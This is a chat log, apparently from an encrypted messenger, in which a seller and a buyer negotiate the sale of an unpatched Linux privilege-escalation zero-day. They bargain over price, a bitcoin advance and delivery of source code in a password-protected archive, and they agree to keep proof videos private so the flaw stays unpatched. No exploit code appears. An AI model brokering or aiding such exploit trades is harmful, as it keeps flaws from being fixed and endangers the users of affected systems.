1572(11:06:55) sc1roka@exploit.im: not sell
1573(11:07:05) kernel12345: amount of btc you will pay in advance ?
1574(11:07:12) sc1roka@exploit.im: some percentage
1575(11:07:18) sc1roka@exploit.im: advance sure
1576(11:07:22) sc1roka@exploit.im: rest after delivery
1577(11:07:27) sc1roka@exploit.im: for the first deal
1578(11:07:43) sc1roka@exploit.im: once we trust each other then it will be great for us
1579(11:07:47) kernel12345: wait wait
1580(11:07:56) kernel12345: do you work for MRSF ?
1581(11:08:02) kernel12345: the hell is this questions ?
1582(11:08:03) sc1roka@exploit.im: No bro
1583(11:08:21) sc1roka@exploit.im: i send this question first to all developer who want to sell me
1584(11:08:31) kernel12345: trying to expose a part of vulnerable thing to release patch
1585(11:08:47) sc1roka@exploit.im: MRSF i haite them man
1586(11:08:50) kernel12345: how do I know you are not working for them or white hat researcher trying to get cve
1587(11:08:52) sc1roka@exploit.im: and dont worry for anything bro
1588(11:08:56) sc1roka@exploit.im: i have solaries 0 day
1589(11:08:59) sc1roka@exploit.im: centos 0 day
1590(11:09:04) kernel12345: to many people around can't trust
1591(11:09:12) sc1roka@exploit.im: yes i can understand bro
1592(11:09:17) kernel12345: you stated that you will pay advanced and added this questions
1593(11:09:23) kernel12345: im afraid you are on of them devs
1594(11:09:31) sc1roka@exploit.im: no no
1595(11:09:40) sc1roka@exploit.im: actually generally developer says that
1596(11:09:48) sc1roka@exploit.im: send money in escrow
1597(11:09:54) sc1roka@exploit.im: so why will i send money in escrow
1598(11:09:59) sc1roka@exploit.im: escrow are fucker
1599(11:10:10) sc1roka@exploit.im: i have been scamed for 20k usd in past
1600(11:10:20) sc1roka@exploit.im: generally we dont send advacnce
1601(11:10:28) sc1roka@exploit.im: but some time developer insist
1602(11:10:36) sc1roka@exploit.im: tahts why i told u bro
1603(11:10:40) kernel12345: I didn't mention escrow , as I said escrow admins take source code of 0days and run away even deal are been made the source code will be given to a lot of people and buyer lost his money for nothing
1604(11:11:26) kernel12345: I need to know how much you will send in advanced after I answer your questions .. you could pay advance and I answer you and give you full exploit source code and you run away
1605(11:11:27) kernel12345: ??
1606(11:11:43) sc1roka@exploit.im: u are right
1607(11:11:55) sc1roka@exploit.im: first
1608(11:12:03) sc1roka@exploit.im: i may ask more question
1609(11:12:14) sc1roka@exploit.im: because we alwayse want to be sure that
1610(11:12:26) sc1roka@exploit.im: before buying we want to answer all question so that
1611(11:12:35) sc1roka@exploit.im: there should be no any problem in buying
1612(11:12:36) kernel12345: ok
1613(11:12:42) kernel12345: let me get this straight
1614(11:12:50) kernel12345: after I answer all questions .. what's next ?
1615(11:13:05) sc1roka@exploit.im: next also may be more question
1616(11:13:13) sc1roka@exploit.im: then it will take some time
1617(11:13:16) sc1roka@exploit.im: 4-5 days
1618(11:13:23) sc1roka@exploit.im: and once we agree
1619(11:13:31) kernel12345: 4/5 days ? and what do I get for waiting that long haha ?
1620(11:13:34) kernel12345: you kidding me
1621(11:13:46) sc1roka@exploit.im: bro why will i kidd u
1622(11:13:47) sc1roka@exploit.im: tel me
1623(11:13:55) sc1roka@exploit.im: what benifit i will get by kidding u
1624(11:13:56) sc1roka@exploit.im: ?
1625(11:13:58) kernel12345: to be honest you don't look like real buyer
1626(11:14:03) kernel12345: who knows
1627(11:14:12) sc1roka@exploit.im: since we have the first deal
1628(11:14:19) kernel12345: I answer you questions you pay something in advance
1629(11:14:25) sc1roka@exploit.im: so we need to trust each other
1630(11:14:27) kernel12345: im not gonna wait that 3/4 days for nothing
1631(11:14:40) sc1roka@exploit.im: but before doing any thing
1632(11:14:44) kernel12345: you pay small btc to book the exploit
1633(11:14:45) sc1roka@exploit.im: pls send me the spec
1634(11:14:48) sc1roka@exploit.im: of that question
1635(11:14:51) kernel12345: the spec ?
1636(11:14:57) kernel12345: moment
1637(11:15:01) sc1roka@exploit.im: spec=specification bro
1638(11:15:05) kernel12345: will start writing
1639(11:15:13) sc1roka@exploit.im: thanks bro
1640(11:15:15) sc1roka@exploit.im: waiting
1641(11:15:38) kernel12345: hope wasting my time right now will not go for free
1642(11:15:41) kernel12345: 1 moment
1643(11:16:20) sc1roka@exploit.im: bro
1644(11:16:23) sc1roka@exploit.im: just one point
1645(11:16:28) sc1roka@exploit.im: not worry for anything
1646(11:20:48) kernel12345: no
1647(11:20:50) kernel12345: I have to worry
1648(11:20:55) kernel12345: im risking my hard work
1649(11:20:58) kernel12345: for nothing at this moment
1650(11:21:10) sc1roka@exploit.im: bro writing a specification
1651(11:21:15) sc1roka@exploit.im: is not in risk
1652(11:21:19) sc1roka@exploit.im: if u dont like that
1653(11:21:21) kernel12345: im writing answers
1654(11:21:22) sc1roka@exploit.im: u can stop it
1655(11:21:38) kernel12345: just afraid of getting scammed or you could be dev trying to patch
1656(11:21:39) sc1roka@exploit.im: because we can't buy untill we know the detail that what we are buying
1657(11:21:41) kernel12345: or get more info
1658(11:21:45) sc1roka@exploit.im: and listen i will buy your all 0 day
1659(11:21:51) sc1roka@exploit.im: man
1660(11:21:57) kernel12345: ok 1 moment
1661(11:21:59) kernel12345: im writing
1662(11:22:00) sc1roka@exploit.im: its seemes you new in exploit
1663(11:22:02) kernel12345: almost done
1664(11:22:10) sc1roka@exploit.im: ok thanks
1665(11:22:19) sc1roka@exploit.im: and also
1666(11:22:27) sc1roka@exploit.im: dont send me spec if u dont like my way
1667(11:22:29) sc1roka@exploit.im: we are a team
1668(11:22:38) sc1roka@exploit.im: i have to send this spec to my manager
1669(11:22:47) sc1roka@exploit.im: and then my manager and me is review it
1670(11:22:57) sc1roka@exploit.im: if i have more question i will ask u
1671(11:23:02) sc1roka@exploit.im: and then we will close deal
1672(11:23:09) sc1roka@exploit.im: if u will work this way
1673(11:23:11) sc1roka@exploit.im: send me spec
1674(11:23:17) sc1roka@exploit.im: if not no need to send spec
1675(11:23:27) sc1roka@exploit.im: at the moment i am closing one ubuntu 0 day
1676(11:23:36) kernel12345: ok
1677(11:23:38) sc1roka@exploit.im: then i will buy this LPE 0 day
1678(11:23:40) sc1roka@exploit.im: 100% sure
1679(11:33:44) kernel12345: you there ?
1680(11:34:40) kernel12345: Should I send answers via email is okay ?
1681(11:37:05) kernel12345: ?
1682(11:39:12) sc1roka@exploit.im: yes bro u can send
1683(11:39:12) sc1roka@exploit.im: pls
1684(11:39:45) kernel12345: done
1685(11:39:47) kernel12345: check your inbox
1686(11:39:53) sc1roka@exploit.im: 1 sec
1687(11:39:56) kernel12345: I didn't send spec in some parts
1688(11:40:01) kernel12345: get back when you finish
1689(11:43:48) sc1roka@exploit.im: spec is good
1690(11:43:57) sc1roka@exploit.im: you dont have to write detail bro
1691(11:44:16) kernel12345: ok
1692(11:44:23) kernel12345: so what's next ?
1693(11:44:38) sc1roka@exploit.im: now spec sent to my manager
1694(11:44:56) kernel12345: okay
1695(11:45:01) sc1roka@exploit.im: and will wait for if there is any question more
1696(11:45:02) kernel12345: how much time will take ?
1697(11:45:16) sc1roka@exploit.im: 1 sec
1698(11:46:18) kernel12345: ok
1699(11:46:22) sc1roka@exploit.im: so we are closing one 0 day
1700(11:46:32) sc1roka@exploit.im: waiting more question on that 0 day
1701(11:46:40) sc1roka@exploit.im: and after this we will close your deal
1702(11:46:43) sc1roka@exploit.im: now u pls tel
1703(11:46:51) sc1roka@exploit.im: how u want to handle payment part
1704(11:46:51) sc1roka@exploit.im: ?
1705(11:46:57) kernel12345: btc
1706(11:47:04) kernel12345: can you do btc payment ?
1707(11:47:12) sc1roka@exploit.im: i can do
1708(11:47:16) kernel12345: sounds good.
1709(11:47:17) sc1roka@exploit.im: btc or bank wire
1710(11:47:21) sc1roka@exploit.im: whatever ok for u
1711(11:47:27) kernel12345: I prefer BTC
1712(11:47:35) sc1roka@exploit.im: but bro one question i have
1713(11:47:43) kernel12345: yes go a head ?
1714(11:47:45) sc1roka@exploit.im: since u have uploaded the video to youtube
1715(11:47:52) kernel12345: I can remove it
1716(11:47:53) sc1roka@exploit.im: now everyone know that there is LPE
1717(11:47:59) sc1roka@exploit.im: thats a problem
1718(11:47:59) kernel12345: if you buying 100%
1719(11:48:17) kernel12345: but no one has exploit src in market or even patched yet
1720(11:49:03) sc1roka@exploit.im: i am not saying you to remove or delet
1721(11:49:17) sc1roka@exploit.im: just saying you for next 0 day
1722(11:49:20) kernel12345: ok
1723(11:49:24) sc1roka@exploit.im: dont make video in public
1724(11:49:29) sc1roka@exploit.im: because to be honest
1725(11:49:30) kernel12345: I will keep video proof private and not sharing on public
1726(11:49:39) sc1roka@exploit.im: we never buy any exploit that video goes in public
1727(11:49:50) sc1roka@exploit.im: but we are buying this time
1728(11:49:54) kernel12345: okay
1729(11:49:58) sc1roka@exploit.im: it seemes you are trusted
1730(11:50:01) kernel12345: next time no public release of videos
1731(11:50:06) kernel12345: thanks
1732(11:50:21) sc1roka@exploit.im: but i must need to be sure that u must have this 0 day
1733(11:50:29) kernel12345: hope to work with on future deals because I hate looking for buyers everytime and wasting time
1734(11:50:29) sc1roka@exploit.im: and its not a scamed
1735(11:50:32) sc1roka@exploit.im: to us
1736(11:50:37) kernel12345: what
1737(11:50:41) kernel12345: im not a scammer
1738(11:50:46) kernel12345: I proof to you
1739(11:50:56) kernel12345: you asked me and I asnwer
1740(11:51:04) kernel12345: I shared all I can with you
1741(11:51:43) kernel12345: every minute you come with a new thing .. talked about advanced and I asked questions and told me you will ask your manager for more questions now tell me im trusted and being rude saying im scammer ?
1742(11:52:01) sc1roka@exploit.im: bro
1743(11:52:07) sc1roka@exploit.im: i am not rude
1744(11:52:13) sc1roka@exploit.im: and i am not saying you as scammer
1745(11:52:28) sc1roka@exploit.im: i am saying 95% peopel on the net are scammer
1746(11:52:43) kernel12345: do I look like a scammer ?
1747(11:52:44) sc1roka@exploit.im: you are good
1748(11:52:51) sc1roka@exploit.im: hats why i told
1749(11:52:55) sc1roka@exploit.im: you lookes like good
1750(11:53:06) sc1roka@exploit.im: and we will buy for sure
1751(11:53:08) kernel12345: you asked questions and I provided answers
1752(11:53:15) kernel12345: you make the advanced payment
1753(11:53:19) kernel12345: you get full exploit src
1754(11:53:24) kernel12345: you make payment of the rest
1755(11:53:27) sc1roka@exploit.im: bro you must have to provide the answer for the deal to be success
1756(11:53:35) kernel12345: what answer again ?
1757(11:53:42) sc1roka@exploit.im: not more
1758(11:53:48) sc1roka@exploit.im: some question if require
1759(11:53:51) sc1roka@exploit.im: if not require
1760(11:53:57) sc1roka@exploit.im: no question will be asked bro
1761(11:54:13) kernel12345: what is that ?
1762(11:54:14) kernel12345: ask
1763(11:54:51) sc1roka@exploit.im: not now bro
1764(11:55:00) sc1roka@exploit.im: let my client revie it
1765(11:55:07) kernel12345: you are just wasting my time
1766(11:55:09) sc1roka@exploit.im: from my side you dont have to worry for anything bro
1767(11:55:11) kernel12345: keeping me waiting for nothing
1768(11:55:25) sc1roka@exploit.im: so u are in hurry to sell
1769(11:55:26) sc1roka@exploit.im: ?
1770(11:55:36) sc1roka@exploit.im: i have told u everything above in chat bro
1771(11:55:53) kernel12345: yes im in a hurry that's why I uploaded the video
1772(11:55:57) kernel12345: I need the money in real life
1773(11:55:58) sc1roka@exploit.im: see this chat
1774(11:56:00) kernel12345: can you get that ?
1775(11:56:02) sc1roka@exploit.im: i wrote above
1776(11:56:04) sc1roka@exploit.im: H
17772:22
1778
1779ok thanks
17802:22
1781
1782and also
17832:22
1784
1785dont send me spec if u dont like my way
17862:22
1787
1788we are a team
17892:22
1790
1791i have to send this spec to my manager
17922:22
1793
1794and then my manager and me is review it
17952:22
1796
1797if i have more question i will ask u
17982:23
1799
1800and then we will close deal
18012:23
1802
1803if u will work this way
18042:23
1805
1806send me spec
18072:23
1808
1809if not no need to send spec
18102:23
1811
1812at the moment i am closing one ubuntu 0 day
1813
1814(11:57:05) kernel12345: this only waste my time
1815(11:57:11) kernel12345: you are the one here new to exploit market
1816(11:57:27) sc1roka@exploit.im: i am not new bro
1817(11:57:27) kernel12345: many sellers freak out after buyers ask to much
1818(11:57:51) kernel12345: then why you leaving me wait .. you got something ask right now and contact your manager or whoever to close the deal
1819(11:58:06) kernel12345: not risking my stuff waiting when other people wanna buy directly
1820(11:58:42) sc1roka@exploit.im: so u sell them
1821(11:58:44) kernel12345: never had to do when selling to a lot of people /. they sent questions and I replied with answers they verified and made the payment
1822(11:58:49) sc1roka@exploit.im: i dont have problem man
1823(11:58:52) kernel12345: I sell only 1 copy to buyer
1824(11:58:58) sc1roka@exploit.im: but when i need
1825(11:59:04) sc1roka@exploit.im: i will ping u for sure
1826(11:59:56) kernel12345: what do you need from me right now ?
1827(12:00:05) sc1roka@exploit.im: nothing for now
1828(12:00:17) sc1roka@exploit.im: now we have to work at our side
1829(12:00:33) sc1roka@exploit.im: just saying pls trust me
1830(12:00:37) sc1roka@exploit.im: we will buy
1831(12:00:49) kernel12345: can you just relaxt for 1 minute and think about this
1832(12:00:55) kernel12345: you contacted me first for buying ?
1833
1834(12:01:02) kernel12345: you asked me and I answerd 100%
1835(12:01:02) sc1roka@exploit.im: yes bro
1836(12:01:07) kernel12345: and what's next now ?
1837(12:01:13) kernel12345: just saying because I hate time wating
1838(12:01:15) kernel12345: wasting*
1839(12:01:20) sc1roka@exploit.im: okay now listen
1840(12:01:39) sc1roka@exploit.im: first it goods that you responded me
1841(12:01:48) sc1roka@exploit.im: now this will be the steps
1842(12:01:56) sc1roka@exploit.im: 1)I am meeting with my clinet
1843(12:02:06) sc1roka@exploit.im: 2)showing this spec
1844(12:02:14) sc1roka@exploit.im: 3)if we have more question
1845(12:02:18) sc1roka@exploit.im: will ask u
1846(12:02:21) sc1roka@exploit.im: if not
1847(12:02:29) sc1roka@exploit.im: then will send some advance
1848(12:02:33) sc1roka@exploit.im: you will send code
1849(12:02:37) sc1roka@exploit.im: we will verify it
1850(12:02:45) sc1roka@exploit.im: and if it 0 day
1851(12:02:48) sc1roka@exploit.im: as u said
1852(12:02:53) kernel12345: wait .. this is bullshit
1853(12:02:54) sc1roka@exploit.im: i will send you remaning payment
1854(12:03:08) kernel12345: you just said you sending answers to your manager and now telling me meeting client
1855(12:03:25) kernel12345: to be honest I don't trust you
1856(12:03:26) sc1roka@exploit.im: man why you talking this way
1857(12:03:31) sc1roka@exploit.im: i really dont know
1858(12:03:40) kernel12345: because your talks are different everytime
1859(12:03:41) sc1roka@exploit.im: my manager is my client
1860(12:03:46) kernel12345: ok
1861(12:03:47) sc1roka@exploit.im: he has to pay me to buy from u
1862(12:03:51) kernel12345: how much time this will take
1863(12:03:52) kernel12345: ?
1864(12:03:56) sc1roka@exploit.im: top people naver come on chat etc
1865(12:04:14) sc1roka@exploit.im: and also in last
1866(12:04:21) sc1roka@exploit.im: you can sell it anwhere u want
1867(12:04:36) kernel12345: I asked 1 question
1868(12:04:39) sc1roka@exploit.im: but we will buy through this process bro
1869(12:04:53) kernel12345: how much time will take until your client accept buying ?
1870(12:04:54) sc1roka@exploit.im: in 0 day buy sell one must have patience
1871(12:05:03) kernel12345: 0days don't last for ever ..
1872(12:05:26) sc1roka@exploit.im: hahah
1873(12:05:33) sc1roka@exploit.im: i have one 0 day from last 5 years
1874(12:05:42) sc1roka@exploit.im: anyway hardelly matter
1875(12:05:44) sc1roka@exploit.im: no issue
1876(12:06:20) kernel12345: ok
1877(12:06:28) kernel12345: let me know when your client reply
1878(12:06:39) sc1roka@exploit.im: thanks bro
1879(12:06:43) sc1roka@exploit.im: i am working on it
1880(12:06:45) kernel12345: my question still have no asnwer
1881(12:06:51) kernel12345: I will have to trust you and wait
1882(12:06:55) sc1roka@exploit.im: wait
1883(12:07:02) sc1roka@exploit.im: u says that how many time will it take
1884(12:07:04) sc1roka@exploit.im: right
1885(12:07:05) sc1roka@exploit.im: ?
1886(12:07:09) kernel12345: yes
1887(12:07:16) sc1roka@exploit.im: so my answer is
1888(12:07:20) kernel12345: 1 hour 2 hour what is that
1889(12:07:24) sc1roka@exploit.im: first we are closing ubuntu 0 day
1890(12:07:31) kernel12345: look man
1891(12:07:35) sc1roka@exploit.im: and after this we will close your LPE
1892(12:07:38) kernel12345: can you please stop talking aboit your work ?
1893(12:07:47) kernel12345: don't mention any other 0days you buying from people
1894(12:07:52) kernel12345: focus on my deal only
1895(12:07:58) kernel12345: finish the other deal and get back to e
1896(12:08:01) sc1roka@exploit.im: sure man
1897(12:08:01) kernel12345: that's all I can say
1898(12:08:03) sc1roka@exploit.im: sorry
1899(12:08:08) kernel12345: no problem
1900(12:08:10) sc1roka@exploit.im: you are right bro
1901(12:08:11) kernel12345: thank you .
1902(12:08:37) sc1roka@exploit.im: welcome bro
1903(12:32:10) sc1roka@exploit.im/xtpdcman has ended his/her private conversation with you; you should do the same.
1904(12:32:11) sc1roka@exploit.im has signed off.
1905(23:55:29) Attempting to refresh the private conversation with sc1roka@exploit.im...
1906(23:55:44) Private conversation with sc1roka@exploit.im lost.
1907(23:55:46) Attempting to start a private conversation with sc1roka@exploit.im...
1908
1909
1910---
1911
1912
1913(19:01:09) Alexander Alexander has signed on.
1914(19:05:02) Attempting to start a private conversation with sc1roka@exploit.im/xtpdcman...
1915(19:05:03) Unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with sc1roka@exploit.im/xtpdcman started.
1916(19:05:09) kernel12345: hello friend
1917(19:05:18) Alexander Alexander : hi friend
1918(19:05:26) Alexander Alexander : how you doing today
1919(19:05:29) kernel12345: sick
1920(19:05:33) Alexander Alexander : oh
1921(19:05:45) kernel12345: what's up ?
1922(19:06:09) Alexander Alexander : nothing new bro but i m giving you 100% assurance that i will buy it
1923(19:06:16) kernel12345: http://prntscr.com/ef86mf
1924(19:06:22) kernel12345: hansa market
1925(19:06:43) kernel12345: I got 1500$ for a guy who I work with and 7 hours still not confirmations
1926(19:06:53) kernel12345: you been into this before
1927(19:07:11) Alexander Alexander : not to worry bro
1928(19:07:16) Alexander Alexander : it will confirm
1929(19:07:22) Alexander Alexander : some time it take even 3 days
1930(19:07:36) Alexander Alexander : if the sended will sent you without fee then it take time
1931(19:07:44) kernel12345: I included fee
1932(19:08:12) kernel12345: 0.34$ fee
1933(19:08:15) Alexander Alexander : but it will be confirmed bro
1934(19:08:20) Alexander Alexander : will take time
1935(19:08:23) Alexander Alexander : not to worry
1936(19:08:39) kernel12345: the problem is that im need of it to get confirmed today or today night so tomorrow morning it will be cashed out
1937(19:08:44) kernel12345: I hope so
1938(19:08:55) kernel12345: any reply from your client ?
1939(19:08:55) Alexander Alexander : lets see
1940(19:09:15) Alexander Alexander : i will get it in in copule of days
1941(19:09:24) Alexander Alexander : btw bro may i ask you one question
1942(19:09:31) kernel12345: get reply in couple of days ?
1943(19:09:36) Alexander Alexander : yes
1944(19:09:37) kernel12345: you kidding
1945(19:09:39) kernel12345: right
1946(19:09:45) kernel12345: I tought you have a reply or couple hours
1947(19:10:01) kernel12345: days man ... 0days don't last for ever you never read that in the hacker manifesto ?
1948(19:10:04) kernel12345: god damn it
1949(19:10:59) Alexander Alexander : bro i am a good business man , i need some time to get approval , getting fund arranjement buying stuff etc
1950(19:11:16) kernel12345: but you didn't mention this before man
1951(19:11:38) kernel12345: you giving me good talk that you will buy from me 100% and telling me needs couple of days
1952(19:11:40) Alexander Alexander : bro i have just asked you question nothing more
1953(19:11:54) kernel12345: yeah ?
1954(19:12:18) Alexander Alexander : so why do u worring if i asked question
1955(19:12:28) Alexander Alexander : i can only say that need some time bro
1956(19:12:32) kernel12345: I said yeah go a head ?
1957(19:12:52) kernel12345: im worry about me waiting then couple of days I get 0 replies
1958(19:37:54) Alexander Alexander : hey u here
1959(19:37:55) Alexander Alexander : ?
1960(19:38:39) Alexander Alexander : are u here bro
1961(19:39:07) kernel12345: yes
1962(19:39:20) Alexander Alexander : do u need advance for LP E
1963(19:39:22) Alexander Alexander : LPE
1964(19:39:23) Alexander Alexander : ?
1965(19:39:38) kernel12345: advance of what ?
1966(19:39:44) Alexander Alexander : i need LPE 0 day
1967(19:39:46) Alexander Alexander : your
1968(19:39:57) kernel12345: ok
1969(19:40:01) kernel12345: what's it that ?
1970(19:40:10) kernel12345: wanna book the 0day or get source code right now
1971(19:40:22) Alexander Alexander : i m just asking
1972(19:40:28) Alexander Alexander : getting source code
1973(19:40:32) Alexander Alexander : what i have to do
1974(19:40:37) kernel12345: yeah
1975(19:41:03) kernel12345: how much in advance ?
1976(19:41:30) Alexander Alexander : generally we dont pay advance
1977(19:41:36) Alexander Alexander : but since its first deal
1978(19:41:45) Alexander Alexander : have to establish trust
1979(19:41:46) Alexander Alexander : so
1980(19:41:56) Alexander Alexander : i will max pay 5% in advance
1981(19:42:09) kernel12345: how much is that
1982(19:42:25) Alexander Alexander : how much is your last price
1983(19:42:27) Alexander Alexander : ?
1984(19:42:33) kernel12345: for the LPE ?
1985(19:42:37) Alexander Alexander : yes
1986(19:43:05) kernel12345: 30k ? as I mention delay sales
1987(19:43:13) kernel12345: will sell only for 28
1988(19:43:17) kernel12345: as I can't wait anymore
1989(19:43:23) Alexander Alexander : bro i will pay u 20 k
1990(19:43:24) Alexander Alexander : usd
1991(19:43:28) Alexander Alexander : its fare price
1992(19:43:44) kernel12345: if this deal goes well we gonna work on future deals ?
1993(19:44:02) Alexander Alexander : yes
1994(19:44:04) kernel12345: then your advance payment should be a little higher than 5%
1995(19:44:18) kernel12345: how much ?
1996(19:44:24) Alexander Alexander : no bro
1997(19:44:35) Alexander Alexander : i will max pay 5% advance that is 1k USD
1998(19:44:40) Alexander Alexander : of 20 k USD
1999(19:44:53) kernel12345: 1000$ ?
2000(19:44:57) Alexander Alexander : yes
2001(19:45:00) kernel12345: make it 2k ?
2002(19:45:05) Alexander Alexander : no bro
2003(19:45:08) kernel12345: that's the best I can work with
2004(19:45:10) Alexander Alexander : pls understand
2005(19:45:15) kernel12345: yeah I fully understand
2006(19:45:21) Alexander Alexander : this is our first deal
2007(19:45:26) kernel12345: 1500$
2008(19:45:29) kernel12345: come on
2009(19:45:33) Alexander Alexander : 1k is last man
2010(19:45:42) kernel12345: I guess I will have to trust you
2011(19:45:50) Alexander Alexander : thats good bro
2012(19:45:57) kernel12345: btc ready ?
2013(19:46:29) Alexander Alexander : btc not a problem bro
2014(19:46:37) Alexander Alexander : we alwayse have enough btc
2015(19:47:13) kernel12345: ok
2016(19:47:19) kernel12345: should we go now ?
2017(19:47:28) Alexander Alexander : no
2018(19:47:30) Alexander Alexander : wait pls
2019(19:47:42) kernel12345: can I zip the source code folder and upload for you on sendspace with password ?
2020(19:47:49) Alexander Alexander : yes wait
2021(19:47:49) kernel12345: wait
2022(19:47:51) kernel12345: yeah ?
2023(19:47:57) Alexander Alexander : you will zip source code
2024(19:48:05) Alexander Alexander : and bind with password everything
2025(19:48:13) Alexander Alexander : i will send you 1k Advance
2026(19:48:19) Alexander Alexander : you send me password
2027(19:48:24) kernel12345: ok
2028(19:48:33) kernel12345: I make me 2 passwords inside every folder
2029(19:48:38) kernel12345: to prevent zip bruteforcing :0
2030(19:48:39) Alexander Alexander : and then in week i will send you your remaning 19k usd
2031(19:48:39) kernel12345: :0
2032(19:48:41) kernel12345: :)
2033(19:48:49) kernel12345: you promise to send rest later ?
2034(19:48:52) Alexander Alexander : man what you thinking bro
2035(19:48:57) kernel12345: nothing
2036(19:49:03) kernel12345: just making sure I don't get scammed
2037(19:49:06) Alexander Alexander : once u work with us
2038(19:49:09) Alexander Alexander : you will be happy
2039(19:50:14) Alexander Alexander : up to how long u will be here
2040(19:50:14) Alexander Alexander : ?
2041(19:50:42) kernel12345: 1 hour
2042(19:50:46) Alexander Alexander : ok
2043(19:50:49) kernel12345: im making zip with password
2044(19:50:51) kernel12345: you ready >
2045(19:50:51) kernel12345: ?
2046(19:50:57) Alexander Alexander : not now bro
2047(19:51:00) kernel12345: damn man
2048(19:51:01) Alexander Alexander : just wait pls
2049(19:51:07) kernel12345: you keep telling me to wait every 1 minute
2050(19:51:21) Alexander Alexander : because i am not only the one
2051(19:51:29) kernel12345: oh
2052(19:51:35) kernel12345: there is someone else in this deal ?
2053(19:51:36) Alexander Alexander : i have to take approval with my boss for everything
2054(19:51:39) kernel12345: ok
2055(19:52:18) kernel12345: I have included all files/source code and write up on the zip archive
2056(19:59:11) kernel12345: uploaded to sendspace
2057(19:59:16) kernel12345: let me know when you here
2058(20:07:46) kernel12345: ??
2059(20:10:28) kernel12345: you there ?
2060(20:10:36) Alexander Alexander : yes bro
2061(20:10:39) Alexander Alexander : wait pls
2062(20:10:43) kernel12345: how much ?
2063(20:10:45) kernel12345: time
2064(20:11:07) kernel12345: I need to go in some minutes and will be back in 5 hours
2065(20:11:26) Alexander Alexander : ok no problem
2066(20:11:43) Alexander Alexander : i will again be online tomorrow same time
2067(20:11:45) Alexander Alexander : for u
2068(20:11:54) kernel12345: you been offline all day
2069(20:12:05) Alexander Alexander : till this sunday yes
2070(20:12:11) Alexander Alexander : because i am in confrence
2071(20:12:16) Alexander Alexander : security confrence
2072(20:12:22) Alexander Alexander : till this sunday
2073(20:12:26) kernel12345: your client is not intrested in my 0day ?
2074(20:12:27) Alexander Alexander : around 1000 people her e
2075(20:12:30) kernel12345: good
2076(20:12:38) Alexander Alexander : i told you i am 100% interested
2077(20:12:43) Alexander Alexander : you have to trust me
2078(20:12:44) Alexander Alexander : and
2079(20:12:53) kernel12345: you 100% sure
2080(20:12:55) Alexander Alexander : you have to wait for final decision
2081(20:12:56) kernel12345: tomorrow will be done ?
2082(20:13:14) kernel12345: I get worries of waiting then you come back saying = NO
2083
2084(20:13:22) kernel12345: then I have to look for buyers again
2085(20:13:29) Alexander Alexander : no bro
2086(20:13:30) Alexander Alexander : pls trust me
2087(20:13:48) kernel12345: ok
2088(20:13:50) Alexander Alexander : 1 sec
2089(20:13:53) kernel12345: I have my trust on you
2090(20:15:15) Alexander Alexander : if i send u 1 k now
2091(20:15:16) Alexander Alexander : when do u want next 19 k
2092(20:15:16) Alexander Alexander : ?
2093(20:15:31) kernel12345: how much time will take you collect 19k
2094(20:15:52) kernel12345: I can wait maximum 5 days ?
2095(20:15:59) Alexander Alexander : 1 sec
2096(20:16:01) kernel12345: ok
2097(20:16:28) Alexander Alexander : 1 sec pls be here
2098(20:16:58) kernel12345: ok
2099(20:17:02) kernel12345: im here waiting for you
2100(20:17:39) Alexander Alexander : hey so listen
2101(20:17:53) Alexander Alexander : we have to wait for this deal
2102(20:18:00) Alexander Alexander : some more time
2103(20:18:05) kernel12345: wait for advance or wait for the 19k ?
2104(20:18:27) Alexander Alexander : wait for advance
2105(20:18:38) kernel12345: you just said paying 1k now and what time I want 19k
2106(20:18:42) kernel12345: you playing me bro ?
2107(20:18:56) kernel12345: you saying something and change it in seconds!!!!
2108(20:18:56) Alexander Alexander : deal is sure
2109(20:19:00) Alexander Alexander : but not now
2110(20:19:04) Alexander Alexander : we have to wait
2111(20:19:09) kernel12345: to be honest im afraid of this deal
2112(20:19:10) kernel12345: no
2113(20:19:12) kernel12345: man
2114(20:19:14) kernel12345: get straight
2115(20:19:29) kernel12345: I have link for 0day on sendspace and can't wait anymore
2116(20:19:42) Alexander Alexander : u have to wait
2117(20:19:42) Alexander Alexander : man
2118(20:20:14) kernel12345: I can't wait that long since is taking so long for 1k in advance it will take a year for the rest 19.000$
2119(20:20:39) Alexander Alexander : man its not wait
2120(20:20:45) kernel12345: I said the truth ..., you say something and change it in seconds .. you just said if you paid 1k what time I need the rest ?
2121(20:20:46) Alexander Alexander : i am saying we are not deling now
2122(20:20:49) Alexander Alexander : we will deal
2123(20:20:52) Alexander Alexander : latter
2124(20:20:55) Alexander Alexander : but sure
2125(20:21:01) Alexander Alexander : if u trust then good
2126(20:21:14) kernel12345: you keep chaging subjects of talk every second
2127(20:21:22) kernel12345: then stop telling things and changing them
2128(20:21:33) kernel12345: you said paying 1k now and you got back saying wait
2129(20:21:35) kernel12345: wait waiy
2130(20:21:43) kernel12345: I don't get this
2131(20:21:45) Alexander Alexander : now lissen very clear
2132(20:21:50) Alexander Alexander : very clear
2133(20:22:01) kernel12345: you are no clear in your talks
2134(20:22:04) Alexander Alexander : next i will ping you once i will be ready for deal
2135(20:22:15) kernel12345: again saying next ?
2136(20:22:32) kernel12345: last talk you said you paying now and tomorrow morning and now you will ping when you are ready ?
2137(20:22:36) kernel12345: give me a date
2138(20:22:39) kernel12345: not talks
2139(20:23:01) kernel12345: im not wasting anymore of my time talking like I did .. give me a date and fix a price that's all I know
2140(20:23:12) kernel12345: this deal getting look like a scam
2141(20:23:58) Alexander Alexander : man scam is when i take your code and not pay that is called scam
2142(20:24:01) Alexander Alexander : this is not scam
2143(20:24:07) kernel12345: ok
2144(20:24:15) kernel12345: tomorrow morning you will be online ?
2145(20:24:38) Alexander Alexander : morning no
2146(20:24:48) kernel12345: so we can be ready at same time for advance and you get source code with password then give me a date to pay rest 19k
2147(20:24:54) kernel12345: you will be like today
2148(20:25:04) Alexander Alexander : i will be online after 20 hower from now
2149(20:25:12) kernel12345: ok
2150(20:25:19) Alexander Alexander : bro
2151(20:25:30) Alexander Alexander : we are good buyer
2152(20:25:37) kernel12345: ok I will calculate that and be on time
2153(20:25:40) Alexander Alexander : you are not understanding my problem
2154(20:25:41) kernel12345: I hope so
2155(20:25:51) kernel12345: im fully understating of your situation man
2156(20:25:59) kernel12345: but you are the one who talk here and not confirm
2157(20:26:00) Alexander Alexander : if u want i can tel u my clear problem
2158(20:26:06) Alexander Alexander : why i m making delay in this LPE deal
2159(20:26:11) kernel12345: why >
2160(20:26:12) kernel12345: ?
2161(20:26:17) Alexander Alexander : Because
2162(20:26:52) Alexander Alexander : we are allready in closing of one 0 day , and untill it will not close , i dont want to confuse my client by offering new 0 day
2163(20:27:04) kernel12345: ok
